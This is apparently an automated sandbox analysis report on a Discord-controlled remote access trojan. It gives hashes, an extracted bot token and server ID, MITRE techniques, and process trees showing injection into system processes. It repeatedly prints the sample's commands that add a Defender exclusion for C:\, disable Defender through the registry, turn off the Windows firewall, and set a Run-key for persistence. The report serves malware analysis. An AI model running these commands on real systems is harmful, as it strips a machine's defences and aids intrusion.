discordrat | dfcebfa87fe9fec6b2a2c3232e5df61644f38294c72ce70e501c2de658bb012f

Analysis

max time kernel
6s
max time network
45s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
30-06-2024 18:22

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Discord rat.exe
Size

79KB
MD5

0e9a169454db4ae7a68279faeb8f0211
SHA1

b092e1194a631e4d86b0228425ec3e02a9772851
SHA256

dfcebfa87fe9fec6b2a2c3232e5df61644f38294c72ce70e501c2de658bb012f
SHA512

9d69e67bcaed24cedc514589bb622473dabbe6962a29ea9436f487c22e9f461558d89a289bfe08b9728197dc7ee4b8d94b4796488a1b4429cf51c805ea7ce982
SSDEEP

1536:GeycDpiiSoH8ovTpPFl+ktd2+6CHpHKcGiNPAeN+cvy1kml4KSYHbC/EuYDbbqi8:xycDpiiSoH8ovTpFl+ktd2+6CHpHKcGY

Score

10^/10

discordrat evasion execution persistence privilege_escalation rat rootkit stealer

Malware Config

Extracted

Family

discordrat

Attributes

discord_token
MTI1Njk1OTk3MzkyMjA1MDA0OA.GV4pf2.KDy4ZWyHX62uy-6sW0ATodCuXPe8ZmbmDfPa0k
server_id
1256666099580403734

Signatures

Discord RAT
A RAT written in C# using Discord as a C2.
stealer rootkit rat persistence discordrat

Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs

Processes:

Discord rat.exe

description	pid	process	target process
PID 4224 created 632	4224	Discord rat.exe	winlogon.exe
PID 4224 created 632	4224	Discord rat.exe	winlogon.exe
PID 4224 created 632	4224	Discord rat.exe	winlogon.exe
PID 4224 created 632	4224	Discord rat.exe	winlogon.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 26 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
3504	powershell.exe
2964	powershell.exe
3388	powershell.exe
5368	powershell.exe
5448	powershell.exe
5408	powershell.exe
1104	powershell.exe
6556	powershell.exe
1616	powershell.exe
4860	powershell.exe
1436	powershell.exe
5364	powershell.exe
6768	powershell.exe
6948	powershell.exe
5384	powershell.exe
5632	powershell.exe
5540	powershell.exe
968	powershell.exe
3952	powershell.exe
5792	powershell.exe
3284	powershell.exe
3016	powershell.exe
2052	powershell.exe
2484	powershell.exe
2908	powershell.exe
5452	powershell.exe

Downloads MZ/PE file

Modifies Windows Firewall 2 TTPs 26 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

Processes:

NetSh.exeNetSh.exeNetSh.exeNetSh.exeNetSh.exeNetSh.exeNetSh.exeNetSh.exeNetSh.exeNetSh.exeNetSh.exeNetSh.exeNetSh.exeNetSh.exeNetSh.exeNetSh.exeNetSh.exeNetSh.exeNetSh.exeNetSh.exeNetSh.exeNetSh.exeNetSh.exeNetSh.exeNetSh.exeNetSh.exe

pid	process
4144	NetSh.exe
4480	NetSh.exe
1484	NetSh.exe
6688	NetSh.exe
2560	NetSh.exe
6488	NetSh.exe
5344	NetSh.exe
7136	NetSh.exe
4888	NetSh.exe
5396	NetSh.exe
5760	NetSh.exe
2992	NetSh.exe
4564	NetSh.exe
6816	NetSh.exe
5476	NetSh.exe
4888	NetSh.exe
3576	NetSh.exe
5180	NetSh.exe
948	NetSh.exe
2160	NetSh.exe
6272	NetSh.exe
5316	NetSh.exe
3468	NetSh.exe
1752	NetSh.exe
5444	NetSh.exe
3476	NetSh.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

Discord rat.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$77Discord rat.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Discord rat.exe"	Discord rat.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 12 IoCs

Web Service

T1102

Processes:

flow	ioc
46	discord.com
47	discord.com
30	discord.com
38	discord.com
24	discord.com
25	discord.com
35	discord.com
45	discord.com
48	discord.com
50	discord.com
18	raw.githubusercontent.com
20	raw.githubusercontent.com

Suspicious use of SetThreadContext 4 IoCs

Processes:

Discord rat.exe

description	pid	process	target process
PID 4224 set thread context of 5412	4224	Discord rat.exe	dllhost.exe
PID 4224 set thread context of 5376	4224	Discord rat.exe	dllhost.exe
PID 4224 set thread context of 1860	4224	Discord rat.exe	dllhost.exe
PID 4224 set thread context of 5496	4224	Discord rat.exe	dllhost.exe

Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

Processes:

NetSh.exeNetSh.exeNetSh.exe

description	ioc	process
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe

Suspicious behavior: EnumeratesProcesses 17 IoCs

Processes:

Discord rat.exedllhost.exedllhost.exedllhost.exepowershell.exedllhost.exe

pid	process
4224	Discord rat.exe
5412	dllhost.exe
5412	dllhost.exe
4224	Discord rat.exe
4224	Discord rat.exe
5376	dllhost.exe
5376	dllhost.exe
4224	Discord rat.exe
1860	dllhost.exe
1860	dllhost.exe
5448	powershell.exe
5448	powershell.exe
4224	Discord rat.exe
4224	Discord rat.exe
5496	dllhost.exe
5496	dllhost.exe
5496	dllhost.exe

Suspicious use of AdjustPrivilegeToken 14 IoCs

Processes:

Discord rat.exedllhost.exedllhost.exedllhost.exepowershell.exedllhost.exe

description	pid	process
Token: SeDebugPrivilege	4224	Discord rat.exe
Token: SeDebugPrivilege	4224	Discord rat.exe
Token: SeDebugPrivilege	5412	dllhost.exe
Token: SeDebugPrivilege	4224	Discord rat.exe
Token: SeDebugPrivilege	4224	Discord rat.exe
Token: SeDebugPrivilege	4224	Discord rat.exe
Token: SeDebugPrivilege	5376	dllhost.exe
Token: SeDebugPrivilege	4224	Discord rat.exe
Token: SeDebugPrivilege	4224	Discord rat.exe
Token: SeDebugPrivilege	1860	dllhost.exe
Token: SeDebugPrivilege	5448	powershell.exe
Token: SeDebugPrivilege	4224	Discord rat.exe
Token: SeDebugPrivilege	4224	Discord rat.exe
Token: SeDebugPrivilege	5496	dllhost.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Discord rat.exe

description	pid	process	target process
PID 4224 wrote to memory of 5412	4224	Discord rat.exe	dllhost.exe
PID 4224 wrote to memory of 5412	4224	Discord rat.exe	dllhost.exe
PID 4224 wrote to memory of 5412	4224	Discord rat.exe	dllhost.exe
PID 4224 wrote to memory of 5412	4224	Discord rat.exe	dllhost.exe
PID 4224 wrote to memory of 5412	4224	Discord rat.exe	dllhost.exe
PID 4224 wrote to memory of 5412	4224	Discord rat.exe	dllhost.exe
PID 4224 wrote to memory of 5412	4224	Discord rat.exe	dllhost.exe
PID 4224 wrote to memory of 5412	4224	Discord rat.exe	dllhost.exe
PID 4224 wrote to memory of 5412	4224	Discord rat.exe	dllhost.exe
PID 4224 wrote to memory of 5412	4224	Discord rat.exe	dllhost.exe
PID 4224 wrote to memory of 5412	4224	Discord rat.exe	dllhost.exe
PID 4224 wrote to memory of 5448	4224	Discord rat.exe	powershell.exe
PID 4224 wrote to memory of 5448	4224	Discord rat.exe	powershell.exe
PID 4224 wrote to memory of 5404	4224	Discord rat.exe	cmd.exe
PID 4224 wrote to memory of 5404	4224	Discord rat.exe	cmd.exe
PID 4224 wrote to memory of 5760	4224	Discord rat.exe	NetSh.exe
PID 4224 wrote to memory of 5760	4224	Discord rat.exe	NetSh.exe
PID 4224 wrote to memory of 5376	4224	Discord rat.exe	dllhost.exe
PID 4224 wrote to memory of 5376	4224	Discord rat.exe	dllhost.exe
PID 4224 wrote to memory of 5376	4224	Discord rat.exe	dllhost.exe
PID 4224 wrote to memory of 5376	4224	Discord rat.exe	dllhost.exe
PID 4224 wrote to memory of 5376	4224	Discord rat.exe	dllhost.exe
PID 4224 wrote to memory of 5376	4224	Discord rat.exe	dllhost.exe
PID 4224 wrote to memory of 5376	4224	Discord rat.exe	dllhost.exe
PID 4224 wrote to memory of 5376	4224	Discord rat.exe	dllhost.exe
PID 4224 wrote to memory of 5376	4224	Discord rat.exe	dllhost.exe
PID 4224 wrote to memory of 5376	4224	Discord rat.exe	dllhost.exe
PID 4224 wrote to memory of 5376	4224	Discord rat.exe	dllhost.exe
PID 4224 wrote to memory of 5408	4224	Discord rat.exe	powershell.exe
PID 4224 wrote to memory of 5408	4224	Discord rat.exe	powershell.exe
PID 4224 wrote to memory of 5568	4224	Discord rat.exe	cmd.exe
PID 4224 wrote to memory of 5568	4224	Discord rat.exe	cmd.exe
PID 4224 wrote to memory of 5316	4224	Discord rat.exe	NetSh.exe
PID 4224 wrote to memory of 5316	4224	Discord rat.exe	NetSh.exe
PID 4224 wrote to memory of 1860	4224	Discord rat.exe	dllhost.exe
PID 4224 wrote to memory of 1860	4224	Discord rat.exe	dllhost.exe
PID 4224 wrote to memory of 1860	4224	Discord rat.exe	dllhost.exe
PID 4224 wrote to memory of 1860	4224	Discord rat.exe	dllhost.exe
PID 4224 wrote to memory of 1860	4224	Discord rat.exe	dllhost.exe
PID 4224 wrote to memory of 1860	4224	Discord rat.exe	dllhost.exe
PID 4224 wrote to memory of 1860	4224	Discord rat.exe	dllhost.exe
PID 4224 wrote to memory of 1860	4224	Discord rat.exe	dllhost.exe
PID 4224 wrote to memory of 1860	4224	Discord rat.exe	dllhost.exe
PID 4224 wrote to memory of 1860	4224	Discord rat.exe	dllhost.exe
PID 4224 wrote to memory of 1860	4224	Discord rat.exe	dllhost.exe
PID 4224 wrote to memory of 4860	4224	Discord rat.exe	powershell.exe
PID 4224 wrote to memory of 4860	4224	Discord rat.exe	powershell.exe
PID 4224 wrote to memory of 644	4224	Discord rat.exe	cmd.exe
PID 4224 wrote to memory of 644	4224	Discord rat.exe	cmd.exe
PID 4224 wrote to memory of 1484	4224	Discord rat.exe	NetSh.exe
PID 4224 wrote to memory of 1484	4224	Discord rat.exe	NetSh.exe
PID 4224 wrote to memory of 5496	4224	Discord rat.exe	dllhost.exe
PID 4224 wrote to memory of 5496	4224	Discord rat.exe	dllhost.exe
PID 4224 wrote to memory of 5496	4224	Discord rat.exe	dllhost.exe
PID 4224 wrote to memory of 5496	4224	Discord rat.exe	dllhost.exe
PID 4224 wrote to memory of 5496	4224	Discord rat.exe	dllhost.exe
PID 4224 wrote to memory of 5496	4224	Discord rat.exe	dllhost.exe
PID 4224 wrote to memory of 5496	4224	Discord rat.exe	dllhost.exe
PID 4224 wrote to memory of 5496	4224	Discord rat.exe	dllhost.exe
PID 4224 wrote to memory of 5496	4224	Discord rat.exe	dllhost.exe
PID 4224 wrote to memory of 5496	4224	Discord rat.exe	dllhost.exe
PID 4224 wrote to memory of 5496	4224	Discord rat.exe	dllhost.exe
PID 4224 wrote to memory of 3284	4224	Discord rat.exe	powershell.exe
PID 4224 wrote to memory of 3284	4224	Discord rat.exe	powershell.exe

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:632

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{a5f515da-b7ac-4119-8c42-5bb1b1fc6360}
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5412

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{a1b9ec80-56bb-4e37-8968-b227231ba434}
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5376

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{15e999e7-c94f-4d81-aac0-235f12486f91}
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1860

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{90d3131a-38f9-4964-95a1-5c4ea1412f60}
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5496

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{091daf2a-61f7-489c-88d9-b62f00737b47}
2⤵
PID:4004

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{311ff084-43f5-4f49-bcf8-146da6b62190}
2⤵
PID:5848

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{b38ca101-bf5d-49ae-b927-cb70ea081e79}
2⤵
PID:216

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{0ce97d47-d166-4876-8220-cddcbf86283a}
2⤵
PID:2204

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{776cafe3-ed80-4ee0-9e9f-d321e83f8246}
2⤵
PID:1096

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{ba389f31-520e-4d1c-bca4-41a1bc77b600}
2⤵
PID:4700

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{9c8a325d-8be9-4333-baff-ac8ab5608632}
2⤵
PID:6732

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{bd61d452-0ace-4728-91b3-7ede8ba9d4ce}
2⤵
PID:5936

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{0622986e-499c-49eb-9381-c33354485d63}
2⤵
PID:5536

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{425e907f-53c2-4c44-b840-13e621747d29}
2⤵
PID:7084

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{f0fcb650-91c7-44bd-9c29-8b727a896708}
2⤵
PID:3380

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{ab7670d8-1d72-4975-a5bd-5f21060586df}
2⤵
PID:6372

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{b23599c6-dfbd-41b0-ad09-72f5d967b8dc}
2⤵
PID:5044

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{0a8d5cee-31e4-4c10-a8a5-8298559d8a3d}
2⤵
PID:1108

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{110912ee-e2b8-43d1-afe1-b4eb1cc5dced}
2⤵
PID:1796

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{952919f1-350b-43f7-96fd-340f10435ccf}
2⤵
PID:5820

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{94d757a4-2925-437f-a6de-66d995355fca}
2⤵
PID:3304

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{d0820608-6924-46d5-83a6-9ec8ef827ebe}
2⤵
PID:4304

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{22b1f68a-c425-4c6d-9edf-17e1f83c5a8e}
2⤵
PID:404

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{89c7c9fb-a55c-41d0-9d75-29fa080a4585}
2⤵
PID:4012

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{cafa56c8-2993-494f-90b0-be756d15709a}
2⤵
PID:3540

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{f02314fc-111c-4d73-967c-6b7108746adb}
2⤵
PID:5616

C:\Users\Admin\AppData\Local\Temp\Discord rat.exe
"C:\Users\Admin\AppData\Local\Temp\Discord rat.exe"
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4224

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5448

C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
2⤵
PID:5404

C:\Windows\SYSTEM32\NetSh.exe
"NetSh.exe" Advfirewall set allprofiles state off
2⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:5760

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
2⤵
- Command and Scripting Interpreter: PowerShell
PID:5408

C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
2⤵
PID:5568

C:\Windows\SYSTEM32\NetSh.exe
"NetSh.exe" Advfirewall set allprofiles state off
2⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:5316

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
2⤵
- Command and Scripting Interpreter: PowerShell
PID:4860

C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
2⤵
PID:644

C:\Windows\SYSTEM32\NetSh.exe
"NetSh.exe" Advfirewall set allprofiles state off
2⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:1484

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
2⤵
- Command and Scripting Interpreter: PowerShell
PID:3284

C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
2⤵
PID:3216

C:\Windows\SYSTEM32\NetSh.exe
"NetSh.exe" Advfirewall set allprofiles state off
2⤵
- Modifies Windows Firewall
PID:3468

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
2⤵
- Command and Scripting Interpreter: PowerShell
PID:5792

C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
2⤵
PID:5876

C:\Windows\SYSTEM32\NetSh.exe
"NetSh.exe" Advfirewall set allprofiles state off
2⤵
- Modifies Windows Firewall
PID:948

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
2⤵
- Command and Scripting Interpreter: PowerShell
PID:5540

C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
2⤵
PID:3784

C:\Windows\SYSTEM32\NetSh.exe
"NetSh.exe" Advfirewall set allprofiles state off
2⤵
- Modifies Windows Firewall
PID:4888

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
2⤵
- Command and Scripting Interpreter: PowerShell
PID:2908

C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
2⤵
PID:4816

C:\Windows\SYSTEM32\NetSh.exe
"NetSh.exe" Advfirewall set allprofiles state off
2⤵
- Modifies Windows Firewall
PID:2992

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
2⤵
- Command and Scripting Interpreter: PowerShell
PID:3952

C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
2⤵
PID:6048

C:\Windows\SYSTEM32\NetSh.exe
"NetSh.exe" Advfirewall set allprofiles state off
2⤵
- Modifies Windows Firewall
PID:4144

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
2⤵
- Command and Scripting Interpreter: PowerShell
PID:1104

C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
2⤵
PID:4904

C:\Windows\SYSTEM32\NetSh.exe
"NetSh.exe" Advfirewall set allprofiles state off
2⤵
- Modifies Windows Firewall
PID:4564

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
2⤵
- Command and Scripting Interpreter: PowerShell
PID:5452

C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
2⤵
PID:5320

C:\Windows\SYSTEM32\NetSh.exe
"NetSh.exe" Advfirewall set allprofiles state off
2⤵
- Modifies Windows Firewall
PID:5396

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
2⤵
- Command and Scripting Interpreter: PowerShell
PID:3016

C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
2⤵
PID:5756

C:\Windows\SYSTEM32\NetSh.exe
"NetSh.exe" Advfirewall set allprofiles state off
2⤵
- Modifies Windows Firewall
PID:5476

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
2⤵
- Command and Scripting Interpreter: PowerShell
PID:968

C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
2⤵
PID:3100

C:\Windows\SYSTEM32\NetSh.exe
"NetSh.exe" Advfirewall set allprofiles state off
2⤵
- Modifies Windows Firewall
PID:5344

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
2⤵
- Command and Scripting Interpreter: PowerShell
PID:2052

C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
2⤵
PID:5844

C:\Windows\SYSTEM32\NetSh.exe
"NetSh.exe" Advfirewall set allprofiles state off
2⤵
- Modifies Windows Firewall
PID:5444

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
2⤵
- Command and Scripting Interpreter: PowerShell
PID:6948

C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
2⤵
PID:6964

C:\Windows\SYSTEM32\NetSh.exe
"NetSh.exe" Advfirewall set allprofiles state off
2⤵
- Modifies Windows Firewall
PID:7136

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
2⤵
- Command and Scripting Interpreter: PowerShell
PID:3504

C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
2⤵
PID:4304

C:\Windows\SYSTEM32\NetSh.exe
"NetSh.exe" Advfirewall set allprofiles state off
2⤵
- Modifies Windows Firewall
PID:4888

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
2⤵
- Command and Scripting Interpreter: PowerShell
PID:6556

C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
2⤵
PID:5372

C:\Windows\SYSTEM32\NetSh.exe
"NetSh.exe" Advfirewall set allprofiles state off
2⤵
- Modifies Windows Firewall
PID:6688

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
2⤵
- Command and Scripting Interpreter: PowerShell
PID:5364

C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
2⤵
PID:6540

C:\Windows\SYSTEM32\NetSh.exe
"NetSh.exe" Advfirewall set allprofiles state off
2⤵
- Modifies Windows Firewall
PID:6816

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
2⤵
- Command and Scripting Interpreter: PowerShell
PID:2964

C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
2⤵
PID:4952

C:\Windows\SYSTEM32\NetSh.exe
"NetSh.exe" Advfirewall set allprofiles state off
2⤵
- Modifies Windows Firewall
PID:2160

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
2⤵
- Command and Scripting Interpreter: PowerShell
PID:5384

C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
2⤵
PID:2912

C:\Windows\SYSTEM32\NetSh.exe
"NetSh.exe" Advfirewall set allprofiles state off
2⤵
- Modifies Windows Firewall
PID:3476

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
2⤵
- Command and Scripting Interpreter: PowerShell
PID:2484

C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
2⤵
PID:1864

C:\Windows\SYSTEM32\NetSh.exe
"NetSh.exe" Advfirewall set allprofiles state off
2⤵
- Modifies Windows Firewall
PID:3576

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
2⤵
- Command and Scripting Interpreter: PowerShell
PID:1616

C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
2⤵
PID:7124

C:\Windows\SYSTEM32\NetSh.exe
"NetSh.exe" Advfirewall set allprofiles state off
2⤵
- Modifies Windows Firewall
PID:4480

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
2⤵
- Command and Scripting Interpreter: PowerShell
PID:3388

C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
2⤵
PID:6772

C:\Windows\SYSTEM32\NetSh.exe
"NetSh.exe" Advfirewall set allprofiles state off
2⤵
- Modifies Windows Firewall
PID:2560

